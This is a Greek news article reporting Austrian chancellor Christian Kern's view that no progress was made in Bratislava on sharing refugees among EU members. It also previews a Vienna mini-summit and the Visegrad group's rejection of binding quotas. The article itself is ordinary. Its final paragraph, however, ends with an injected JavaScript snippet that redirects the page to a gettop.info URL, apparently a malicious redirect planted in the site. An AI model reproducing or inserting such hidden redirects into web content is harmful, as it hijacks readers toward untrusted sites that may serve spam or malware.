Κερν: Kαμία πρόοδος στην Μπρατισλάβα για το προσφυγικό

0
8

 

Kαμία πρόοδος υπήρξε στο ζήτημα της κατανομής προσφύγων στις χώρες-μέλη της Ευρωπαϊκής Ένωσης, όπως τόνισε ο ομοσπονδιακός καγκελάριος της Αυστρίας και αρχηγός των Σοσιαλδημοκρατών, Κρίστιαν Κερν σε συνέντευξή του στη δημόσια Αυστριακή Ραδιοφωνία.

Στη Βιέννη, διοργανώνεται το Σάββατο 24 Σεοτεμβρίου, και με πρωτοβουλία του κ. Κερν «μίνι» Σύνοδος Κορυφής για το Προσφυγικό, όπου αναμένεται να συμμετάσχουν ο Έλληνας πρωθυπουργός Αλέξης Τσίπρας αλλά και η Γερμανίδα καγκελάριος Άνγκελα Μέρκελ.

Στη Σύνοδο αναμένονται επίσης οι πρόεδροι της Ευρωπαϊκής Επιτροπής Ζαν Κλοντ Γιούνκερ, και του Ευρωπαϊκού Συμβουλίου Ντόναλντ Τουσκ, όπως επίσης οι πρωθυπουργοί από Αλβανία, Βουλγαρία, Κροατία, Ουγγαρία, ΠΓΔΜ, Ρουμανία, Σερβία και Σλοβενία.

Η συμμετοχή του Έλληνα πρωθυπουργού Αλέξη Τσίπρα σε αυτή τη Σύνοδο Κορυφής, ως ηγέτη μιας άμεσα ενδιαφερόμενης χώρας που αντιμετωπίζει τεράστια προβλήματα, θεωρείται ιδιαίτερα σημαντική, ενώ η παρουσία της Γερμανίδας καγκελάριου, φαίνεται πως ενισχύει τις θέσεις του Αυστριακού ομολόγου της, Κρίστιαν Κερν, στην προσφυγική κρίση, οι οποίες συγκλίνουν με τις δικές της.

«Θα πρέπει κανείς να συνεχίσει να ασκεί πίεση», ανέφερε ο καγκελάριος προς την κατεύθυνση των τεσσάρων χωρών της αποκαλούμενης «Ομάδας του Βίζεγκραντ» (Ουγγαρία, Πολωνία, Σλοβακία και Τσεχία), κρατώντας απόσταση από την πρόταση που παρουσίασε η «Ομάδα» στην Μπρατισλάβα για το μέλλον της ΕΕ, στην οποία αυτές απορρίπτουν κατηγορηματικά μία δεσμευτική ποσόστωση στην κατανομή προσφύγων σε όλες τις χώρες-μέλη της, που έχει προσδιοριστεί με απόφαση της ΕΕ και που οι ίδιες αρνούνται επίμονα να εφαρμόσουν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here